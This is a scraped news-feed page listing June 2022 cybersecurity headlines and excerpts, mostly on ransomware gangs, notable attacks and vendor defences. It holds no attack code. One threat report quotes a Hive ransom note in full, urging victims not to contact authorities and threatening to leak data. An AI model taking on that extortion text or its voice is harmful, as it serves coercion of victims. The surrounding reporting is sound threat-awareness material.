What's new arround internet
| Src | Date (GMT) | Titre | Description | Tags | Stories | Notes |
 |
2022-06-06 21:34:00 | Welcome to RSA – How boards and management teams are stopping attackers amidst macro headwinds, the year of great resignation, digital expansion, and escalated cybersecurity activities (lien direct) | RSA has finally arrived in person. We look forward to seeing our customers, partners, and many others in the broader security ecosystem. At Anomali, we exist to stop attackers and given the current environment, we want to share relevant insight from the ecosystem and the excitement around our unique delivery of open XDR. In fact, we feel compelled to make it available to test for free. Let’s start at the top of the lighthouse, and then distill the best way to navigate the infinite chess game with adversaries, including ransomware and exploits. While doing so, we will also focus on automation, reducing response time and ultimately making security spend more efficient. Boards and management teams are navigating a complex new terrain of macro headwinds (including inflation), geopolitical uncertainty, and escalated cybersecurity activities at a time when digital transformation is paramount and talent scarcity is at an all-time high. What is unequivocal is that management teams must continue their laser focus on the efficacy of their security posture and in tandem, they must optimize cost and efficiency. More than ever, management teams need relevant business insight to swiftly protect themselves and their stakeholders from cyber-attacks. That is our obsession at Anomali – our open XDR solution is helping management teams amplify visibility, enrich with relevant context and in turn, stop the attackers and predict their next move. We deliver unique use cases, starting with a proprietary attack surface management report after ingesting all relevant telemetries including cloud platforms and correlating literally hundreds of trillions of telemetry events times cyber threats per second. In tandem, we are automating processes, reducing response time and optimizing security spend across the environment. The advent of the Cloud, digital transformation at large, and the dynamic of remote workforce have collectively expanded the attack surface of organizations to exponentially new levels. Today’s attack surface comprises all the entry points where there is unauthorized access to digital assets. These assets can be externally facing such as a web application server or an API server, or inadvertently exposed due to a misconfigured firewall such as a network storage device, etc. According to Gartner, External Attack Surface Management (EASM) is an emerging cybersecurity discipline that identifies and manages the risks presented by internet-facing assets and systems. EASM refers to the processes and technology necessary to discover external-facing assets and effectively manage the vulnerabilities of those assets. Anomali XDR is a unique solution to identify your attack surface and highly targeted assets. With proprietary big data technology, you will be able to ingest all security telemetries (SIEM, EDR, NDR and public clouds), distill what’s relevant by correlating with the largest repository of global intelligence to deliver actionable insight across your entire security environment. Our XDR solution provides continuous detection of exposed assets and identifies threat actors that are attempting to breach them. Additionally, our XDR solution identifies assets that need urgent patches or other remediation for known vulnerabilities allowing additional insights into the criticality of the exposed asset. Following is summary of recent attack scenarios and how the Anomali Platform has been used in quickly and efficiently detecting and blocking adversaries. Before we start, let us summarize the initial reconnaissance that we have developed with CIOs, CISOs and their team. Do you know your organization’s Attack Surface? Even more importantly, what assets in your organization are highly targeted and who are the actors behind these targeted attacks? Can you continuously monitor the ever-changing landscape of actors and proactively block them? Are you constantly trying to reduce your attack surface? Are you able to quickly take prioritized act | Ransomware Vulnerability Threat Patching | ||
 |
2022-06-06 17:01:20 | QBot now pushes Black Basta ransomware in bot-powered attacks (lien direct) | The Black Basta ransomware gang has partnered with the QBot malware operation to gain spread laterally through hacked corporate environments. [...] | Ransomware Malware | ||
|
2022-06-06 15:54:02 | Mandiant: “No evidence” we were hacked by LockBit ransomware (lien direct) | American cybersecurity firm Mandiant is investigating LockBit ransomware gang's claims that they hacked the company's network and stole data. [...] | Ransomware | ||
|
2022-06-06 12:56:10 | Ransomware gangs now give victims time to save their reputation (lien direct) | Threat analysts have observed an unusual trend in ransomware group tactics, reporting that initial phases of victim extortion are becoming less open to the public as the actors tend to use hidden or anonymous entries. [...] | Ransomware Threat | ||
 |
2022-06-06 11:09:01 | Feature: Beating Ransomware With Advanced Backup and Data Defense Technologies (lien direct) |
Type:
Story
Image:
Link:
Beating Ransomware With Advanced Backup and Data Defense Technologies
Beating Ransomware With Advanced Backup and Data Defense Technologies
|
Ransomware | ||
|
2022-06-06 11:02:40 | Beating Ransomware With Advanced Backup and Data Defense Technologies (lien direct) | Question: if we can mitigate file encryption ransomware with backup, can we mitigate double extortion by adding advanced PII protection through data encryption or tokenization? | Ransomware | ||
 |
2022-06-06 00:00:00 | Closing the Door: DeadBolt Ransomware Locks Out Vendors With Multitiered Extortion Scheme (lien direct) | In this report, we investigate the reasons that the DeadBolt ransomware family is more problematic for its victims than other ransomware families that previously targeted NAS devices.
|
Ransomware | ||
|
2022-06-03 18:02:33 | Foxconn Confirms Ransomware Hit Factory in Mexico (lien direct) | Electronics manufacturing giant Foxconn has confirmed that its Tijuana-based Foxconn Baja California factory was hit by ransomware in late May. Specialized in consumer electronics, industrial operations, and medical devices, the facility employs roughly 5,000 people. | Ransomware | ||
 |
2022-06-03 16:54:10 | Ransomware: May 2022 review (lien direct) | >May 2022 saw the continued dominance of LockBit, and a possible disbursement of the Conti gang into other ransomware groups. | Ransomware | ||
|
2022-06-03 16:41:26 | The Week in Ransomware - June 3rd 2022 - Evading sanctions (lien direct) | Ransomware gangs continue to evolve their operations as victims refuse to pay ransoms due to sanctions or other reasons. [...] | Ransomware | ||
 |
2022-06-03 13:10:32 | (Déjà vu) Webinar June 30th 2022: Live Attack Simulation - Ransomware Threat Hunter Series (lien direct) |
|
Ransomware Threat | ||
 |
2022-06-03 11:03:13 | Healthcare organizations face rising ransomware attacks – and are paying up (lien direct) | Via their insurance companies, natch Healthcare organizations, already an attractive target for ransomware given the highly sensitive data they hold, saw such attacks almost double between 2020 and 2021, according to a survey released this week by Sophos.… | Ransomware | ||
 |
2022-06-03 09:37:18 | Ransomware Roundup - 2022/06/02 (lien direct) | FortiGuard Labs is aware of a number of new ransomware strains for the week of May 30th, 2022. It is imperative to raise awareness about new ransomware strains as infections can cause severe damage to organizations. This week's Ransomware Roundup Threat Signal covers Hive ransomware, Bright Black Ransomware and Karakurt Data Extortion Group, and Fortinet protections against them.What is Hive Ransomware?Hive ransomware is a Ransomware-as-a-Service (RaaS) that was first observed in June 2021. This ransomware is highlighted in this Threat Signal as Costa Rica's public health system was reportedly compromised by the ransomware.As a RaaS, the Hive ransomware group consists of two types of groups: ransomware operator (developer) and affiliates. The former develops Hive ransomware, provides support for its affiliates, operates ransom payment site as well as a date leak site called "HiveLeaks" on Tor. The latter carries out actual attacks that infect victims, exfiltrate data from victims, and deploy Hive ransomware onto the compromised machine. An apparent underground forum post that recruited Hive ransomware conspirators promised 80% cut for the affiliates. Hive ransomware is the main arsenal that is deployed to the compromised machine to encrypt files. Before the file encryption takes place, data is stolen from the victim and shadow copies are deleted, which makes file recovery awfully difficult. Typical files encrypted by Hive ransomware have a .hive extension. Other reported file extensions include .aumcc, .sncip, .accuj and .qxycv. According to a report published by Group-IB, "the data encryption is often carried out during non-working hours or at the weekend" in an attempt to encrypt as many files as possible without being noticed.Typical ransom note left behind by Hive ransomware below:Your network has been breached and all data is encrypted.To decrypt all the data you will need to purchase our decryption software.Please contact our sales department at: xxxx://[removed].onion/ Login: [removed] Password: [removed] Follow the guidelines below to avoid losing your data: - Do not shutdown or reboot your computers, unmount external storages. - Do not try to decrypt data using third party software. It may cause irreversible damage. - Don't fool yourself. Encryption has perfect secrecy and it's impossible to decrypt without knowing the key. - Do not modify, rename or delete *.key.hive files. Your data will be undecryptable. - Do not modify or rename encrypted files. You will lose them. - Do not report to authorities. The negotiation process will be terminated immediately and the key will be erased. - Do not reject to purchase. Your sensitive data will be publicly disclosed at xxxx://[removed]onion/ The group employs a double extortion technique which victims are asked to make a ransom payment in order to recover encrypted files as well as to prevent the stolen data from being published to "HiveLeaks". Some victims reportedly received phone calls from Hive threat actors. The victim will receive a decryption tool upon the completion of payment, however, there was a chatter that suggests the decryption tool did not work as advertised in some cases and made virtual machines unbootable due to the tool corrupting the MBR (Master Boot Record).Initial attack vectors include phishing emails with malicious attachment, attacking vulnerable RDP servers, and the use of compromised VPN credentials. Purchasing network access from initial access brokers is a possibility as well.Hive ransomware reportedly victimized companies across wide range of industries such as (but not restricted to) real estate, IT and manufacturing. Some RaaS have a policy to exclude governmental educational and military organizations, health care, and critical infrastructures such as gas pipelines and power plants. Hive ransomware does not appear to have such policy as its victims include health care and government organizations. In August, 2021, the Federal Bureau of Investigation (FBI) released a flash alert on Hive ransomware.See the Appendix for | Ransomware Malware Tool Threat | ||
 |
2022-06-02 18:41:37 | Global Ransomware Damage Costs Predicted To Exceed $265 Billion By 2031 (lien direct) | >Fastest growing type of cybercrime is expected to attack a business, consumer, or device every 2 seconds by 2031 Press Release – David Braue Melbourne, Australia – Jun. 3, 2021 A 2017 report from Cybersecurity Ventures predicted ransomware damages would cost the world $5 billion | Ransomware | ||
 |
2022-06-02 18:34:36 | LockBit ransomware attack impacted production in a Mexican Foxconn plant (lien direct) | >LockBit ransomware gang claimed responsibility for an attack against the electronics manufacturing giant Foxconn that impacted production in Mexico The electronics manufacturing giant Foxconn confirmed that its production plant in Tijuana (Mexico) has been impacted by a ransomware attack in late May. The LockBit ransomware gang claimed responsibility for an attack and announced that it […] | Ransomware | ||
|
2022-06-02 17:09:12 | Conti leaked chats confirm that the gang\'s ability to conduct firmware-based attacks (lien direct) | The analysis of the internal chats of the Conti ransomware group revealed the gang was working on firmware attack techniques. The analysis of Conti group’s chats, which were leaked earlier this year, revealed that the ransomware gang has been working on firmware attack techniques. An attack against firmware could give threat actors significant powers, they are hard to […] | Ransomware Threat | ||
|
2022-06-02 16:35:29 | Evil Corp switches to LockBit ransomware to evade sanctions (lien direct) | The Evil Corp cybercrime group has now switched to deploying LockBit ransomware on targets' networks to evade sanctions imposed by the U.S. Treasury Department's Office of Foreign Assets Control (OFAC). [...] | Ransomware | ||
|
2022-06-02 15:01:51 | Ransomware gang now hacks corporate websites to show ransom notes (lien direct) | A ransomware gang is taking extortion to a new level by publicly hacking corporate websites to publicly display ransom notes. [...] | Ransomware Hack | ||
 |
2022-06-02 13:09:11 | Costa Rica Public Health Service Ransomware Attack (lien direct) | Costa Rica's public health service, known as the Costa Rican Social Security Fund (CCSS), has been forced to take its systems offline after being hit by Hive ransomware. | Ransomware | ||
 |
2022-06-02 13:08:55 | Cybercriminals Expand Attack Radius and Ransomware Pain Points (lien direct) | Melissa Bischoping, security researcher with Tanium and Infosec Insiders columnist, urges firms to consider the upstream and downstream impact of "triple extortion" ransomware attacks. | Ransomware | ||
 |
2022-06-02 13:00:02 | Neutralizing Novel Trickbot Attacks With AI (lien direct) | Artificial intelligence technology can detect the latest wave of Trickbot ransomware and block the attack before it causes damage. | Ransomware | ||
 |
2022-06-02 13:00:00 | Recovering Ransom Payments: Is This the End of Ransomware? (lien direct) | >What’s the best way to stop ransomware? Make it riskier and less lucrative for cyber criminals. Nearly all intruders prefer to collect a ransom in cryptocurrency. But it’s a double-edged sword since even crypto leaves a money trail. Recovering ransomware payouts could lead to a sharp decline in exploits. Ransomware is still today’s top attack […] | Ransomware Guideline | ||
|
2022-06-02 12:57:58 | Healthcare Pays More Ransom Demands, But Get Less Data Back (lien direct) | According to a new Sophos report, State of Ransomware in Healthcare 2022, twice as many healthcare organizations paid the ransom in 2021 vs 2020. Though they paid the ransom, only 2% got all of their data back. Interviews with 381 it enterprises in 31 countries revealed the following: Ransomware attacks on healthcare almost doubled – […] | Ransomware | ||
|
2022-06-02 12:52:06 | Leaks Show Conti Ransomware Group Working on Firmware Exploits (lien direct) | The recent Conti leaks show that the notorious ransomware group has been working on firmware exploits targeting the Intel Management Engine (ME) system. | Ransomware | ★★★★★ | |
|
2022-06-02 11:23:59 | Why Ransomware Timeline Shrinks By 94%? (lien direct) | Researchers at IBM’s X-Force team are reporting a 94% reduction in the duration of an enterprise ransomware attack from 2019 to 2021. Though the overall time was reduced, the attacker's tools appeared to remain mostly the same. Research showed that ransomware operators were most efficient against enterprises “who have not implemented effective measures to combat […] | Ransomware Tool | ||
|
2022-06-02 10:45:08 | Access Brokers and Ransomware-as-a-Service Gangs Tighten Relationships (lien direct) | Access brokers sell compromised network access to help ransomware gangs launch attacks | Ransomware | ||
|
2022-06-02 09:22:31 | Conti ransomware targeted Intel firmware for stealthy attacks (lien direct) | Researchers analyzing the leaked chats of the notorious Conti ransomware operation have discovered that teams inside the Russian cybercrime group were actively developing firmware hacks. [...] | Ransomware | ||
 |
2022-06-02 08:04:00 | Cybercriminals look to exploit Intel ME vulnerabilities for highly persistent implants (lien direct) | Leaked internal chats from the Conti ransomware gang suggests the group has been researching and developing code to compromise the Intel Management Engine (Intel ME), the out-of-band management functionality built into Intel chipsets. The goal of this technique is to install malicious code deep inside computer firmware where it cannot be blocked by operating systems and third-party endpoint security products.Firmware implants are powerful and are usually used in high-value operations by state-sponsored hacker groups. However, over the past couple of years cybercriminal gangs have also shown an interest, with developers of the notorious TrickBot botnet adding an UEFI attack module in 2020. According to new research by security firm Eclypsium, the Conti ransomware group developed proof-of-concept code to exploit Intel ME firmware and gain code execution in System Management Mode, a highly privileged execution environment of the CPU.To read this article in full, please click here | Ransomware | ||
 |
2022-06-02 06:00:00 | À Hadès et dos: UNC2165 passe à Lockbit pour échapper aux sanctions To HADES and Back: UNC2165 Shifts to LOCKBIT to Evade Sanctions (lien direct) |
Le Contrôle du Bureau des actifs étrangers (OFAC) du Département des États-Unis (OFAC) | Ransomware Malware | ★★★★ | |
 |
2022-06-02 05:13:36 | Conti Leaks Reveal Ransomware Gang\'s Interest in Firmware-based Attacks (lien direct) | An analysis of leaked chats from the notorious Conti ransomware group earlier this year has revealed that the syndicate has been working on a set of firmware attack techniques that could offer a path to accessing privileged code on compromised devices. "Control over firmware gives attackers virtually unmatched powers both to directly cause damage and to enable other long-term strategic goals," | Ransomware | ||
|
2022-06-02 04:20:27 | Foxconn confirms ransomware attack disrupted production in Mexico (lien direct) | Foxconn electronics manufacturer has confirmed that one of its Mexico-based production plants has been impacted by a ransomware attack in late May. [...] | Ransomware | ||
|
2022-06-02 04:01:03 | Researchers Demonstrate Ransomware for IoT Devices That Targets IT and OT Networks (lien direct) | As ransomware infections have evolved from purely encrypting data to schemes such as double and triple extortion, a new attack vector is likely to set the stage for future campaigns. Called Ransomware for IoT or R4IoT by Forescout, it's a "novel, proof-of-concept ransomware that exploits an IoT device to gain access and move laterally in an IT [information technology] network and impact the OT [ | Ransomware | ||
|
2022-06-02 02:00:00 | Ransomware roundup: System-locking malware dominates headlines (lien direct) | As we head into the unofficial start of summer, it does not appear the criminal groups that run ransomware schemes are planning to take any time to rest. Ransomware was all over the infosec news headlines in the past week, with one new report revealing that its presence has grown more in the last year than in the past several years combined.Here's roundup of noteworthy ransomware stories you might have missed.DBIR finds ransomware increased by double digits Verizon Business' annual Data Breach Investigations Report (DBIR) is out and confirms what many CISOs already know: ransomware continues to plague business. Ransomware-related breach instances rose 13%, an increase larger than in the past 5 years combined.To read this article in full, please click here | Ransomware Data Breach Malware | ||
|
2022-06-02 00:12:10 | Ransomware attack turns 2022 into 1977 for Somerset County (lien direct) | >Somerset County in New Jersey has been sent back to 1977 after a ransomware attack shut down various historical record checks. | Ransomware | ||
|
2022-06-02 00:00:00 | YourCyanide: A CMD-based Ransomware With Multiple Layers of Obfuscation (lien direct) | The Trend Micro Threat Hunting team recently analyzed a series of CMD-based ransomware variants with a number capabilities such as stealing user information, bypassing remote desktop connections, and propagating through email and physical drives.
|
Ransomware Threat | ||
 |
2022-06-01 22:08:53 | The Business (and Success) of Ransomware Explained as a Simple Funnel (lien direct) |
|
Ransomware | ||
|
2022-06-01 17:47:00 | Anomali Cyber Watch: TURLA\'s New Phishing-Based Reconnaissance Campaign in Eastern Europe, Unknown APT Group Has Targeted Russia Repeatedly Since Ukraine Invasion and More (lien direct) | The various threat intelligence stories in this iteration of the Anomali Cyber Watch discuss the following topics: Chromeloader, Goodwill, MageCart, Saitama, Turla and Yashma. The IOCs related to these stories are attached to Anomali Cyber Watch and can be used to check your logs for potential malicious activity.
Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed.
Trending Cyber News and Threat Intelligence
Credit Card Stealer Targets PsiGate Payment Gateway Software
(published: May 25, 2022)
Sucuri Researchers have detailed their findings on a MageCart skimmer that had been discovered within the Magento payment portal. Embedded within the core_config_data table of Magento’s database, the skimmer was obfuscated and encoded with CharCode. Once deobfuscated, a JavaScript credit card stealer was revealed. The stealer is able to acquire text and fields that are submitted to the payment page, including credit card numbers and expiry dates. Once stolen, a synchronous AJAX is used to exfiltrate the data.
Analyst Comment: Harden endpoint security and utilize firewalls to block suspicious activity to help mitigate against skimmer injection. Monitor network traffic to identify anomalous behavior that may indicate C2 activity.
MITRE ATT&CK: [MITRE ATT&CK] Exfiltration Over C2 Channel - T1041 | [MITRE ATT&CK] Data Encoding - T1132 | [MITRE ATT&CK] Input Capture - T1056
Tags: MageCart, skimmer, JavaScript Magento, PsiGate, AJAX
How the Saitama Backdoor uses DNS Tunneling
(published: May 25, 2022)
MalwareBytes Researchers have released their report detailing the process behind which the Saitama backdoor utilizes DNS tunneling to stealthy communicate with command and control (C2) infrastructure. DNS tunneling is an effective way to hide C2 communication as DNS traffic serves a vital function in modern day internet communications thus blocking DNS traffic is almost never done. Saitama formats its DNS lookups with the structure of a domain consisting of message, counter . root domain. Data is encoded utilizing a hardcoded base36 alphabet. There are four types of messages that Saitama can send using this method: Make Contact to establish communication with a C2 domain, Ask For Command to get the expected size of the payload to be delivered, Get A Command in which Saitama will make Receive requests to retrieve payloads and instructions and finally Run The Command in which Saitama runs the instructions or executes the payload and sends the results to the established C2.
Analyst Comment: Implement an effective DNS filtering system to block malicious queries. Furthermore, maintaining a whitelist of allowed applications for installation will assist in preventing malware like Saitama from being installed.
MITRE ATT&CK: [MITRE ATT&CK] Data Encoding - T1132 | [MITRE ATT&CK] Exfiltration Over C2 Channel - T1041
Tags: C2, DNS, Saitama, backdoor, base36, DNS tunneling
|
Ransomware Malware Tool Threat | APT 19 | |
|
2022-06-01 16:33:21 | Ordr Secures $40 Million in Series C Funding to Answer Increased Demand for Connected Device Security (lien direct) | Rising threat of data breaches and ransomware attacks drives need for complete and accurate real-time information about devices and their risks. | Ransomware Threat | ||
|
2022-06-01 12:59:33 | CyberheistNews Vol 12 #22 [Heads Up] The New Verizon 2022 Data Breach Investigation Report Shows Sharp Rise in Ransomware (lien direct) |
|
Ransomware Data Breach | ||
|
2022-06-01 11:16:56 | Researchers Devise Attack Using IoT and IT to Deliver Ransomware Against OT (lien direct) | Critical industries must prepare themselves for a new wave of ransomware attacks specifically targeting OT | Ransomware | ||
|
2022-06-01 10:00:00 | Countdown to Ransomware: Analysis of Ransomware Attack Timelines (lien direct) | >This research was made possible through the data collection efforts of Maleesha Perera, Joffrin Alexander, and Alana Quinones Garcia. Key Highlights The average duration of an enterprise ransomware attack reduced 94.34% between 2019 and 2021: 2019: 2+ months — The TrickBot (initial access) to Ryuk (deployment) attack path resulted in a 90% increase in ransomware […] | Ransomware | ||
|
2022-06-01 07:32:43 | Ransomware attacks need less than four days to encrypt systems (lien direct) | The duration of ransomware attacks in 2021 averaged 92.5 hours, measured from initial network access to payload deployment. In 2020, ransomware actors spent an average of 230 hours to complete their attacks and 1637.6 hours in 2019. [...] | Ransomware | ||
|
2022-06-01 06:53:54 | Hive ransomware gang hit Costa Rica public health service (lien direct) | >Costa Rican Social Security Fund, Costa Rica ‘s public health service, was hit by a Hive ransomware attack. Costa Rican Social Security Fund, Costa Rica ‘s public health service (aka CCCS), was hit today by a Hive ransomware attack, BleepingComputer reported. The attack occurred early this morning, Tuesday, May 31, 2022. The authorities are investigating […] | Ransomware | ||
|
2022-06-01 00:30:00 | Costa Rica Public Health System Targeted by Ransomware (lien direct) | Another attempted hacking of a Costa Rican government agency's computer system led the country's public health agency to shut down its systems Tuesday to protect itself, complicating the medical care of thousands of people. | Ransomware | ||
|
2022-05-31 20:53:40 | Threat profile: RansomHouse makes extortion work without ransomware (lien direct) | >RansomHouse, a new extortion group, distances itself from ransomware. However, it seems like it had ties to ransomware groups in the past. | Ransomware | ||
 |
2022-05-31 19:57:58 | Costa Rica May Be Pawn in Conti Ransomware Group\'s Bid to Rebrand, Evade Sanctions (lien direct) | Costa Rica's national health service was hacked sometime earlier this morning by a Russian ransomware group known as Hive. The intrusion comes just weeks after Costa Rican President Rodrigo Chaves declared a state of emergency in response to a data ransom attack from a different Russian ransomware gang - Conti. Ransomware experts say there is good reason to believe the same cybercriminals are behind both attacks, and that Hive has been helping Conti rebrand and evade international sanctions targeting extortion payouts to cybercriminals operating in Russia. | Ransomware | ||
 |
2022-05-31 16:33:34 | New Microsoft Office “Follina” zero-day Already Shared on Ransomware Forums (lien direct) |
The new zero-day MS Word vulnerability recently discovered by Nao_Sec on May 27, 2022, titled 'Follina' (CVE-2022-30190) targeting Microsoft Office is being actively utilised, Minerva researchers found. The exploit targets a vulnerability in Microsoft's Windows Support Diagnostic Tool (MSDT) that occurs due to the ms-msdt MSProtocol URI scheme which could load code and execute via PowerShell despite macros being disabled. Successful exploitation of the CVE enables an attacker to execute arbitrary code on the targeted host. However, the attacker must socially engineer the victim into opening a specially crafted file to exploit this issue which requires a targeted effort to succeed making the vulnerability less prominent to unskilled actors but highly relevant to ransomware gangs such as CONTI, CL0P and ALPHV. To combat this new threat businesses must focus on threat prevention-an approach in which Minerva excels. |
Ransomware Tool Vulnerability Threat | ||
 |
2022-05-31 16:00:00 | Magniber Ransomware Now Targets Windows 11 Machines (lien direct) | Magniber ransomware upgraded to prompt fake Windows 11 updates | Ransomware | ||
|
2022-05-31 13:43:00 | Paying Ransomware? Should You Really Pay Ransom Settlements? (lien direct) | Ransomware is one of the top threats facing organizations and individuals today. While often organizations may feel compelled to pay ransom settlements, it is a decision that should be considered very carefully. Read more.
|
Ransomware Threat | ||
|
2022-05-31 13:34:25 | Costa Rica\'s public health agency hit by Hive ransomware (lien direct) | All computer systems on the network of Costa Rica's public health service (known as Costa Rican Social Security Fund or CCCS) are now offline following a Hive ransomware attack that hit them this morning. [...] | Ransomware |
To see everything:
Our RSS (filtrered)
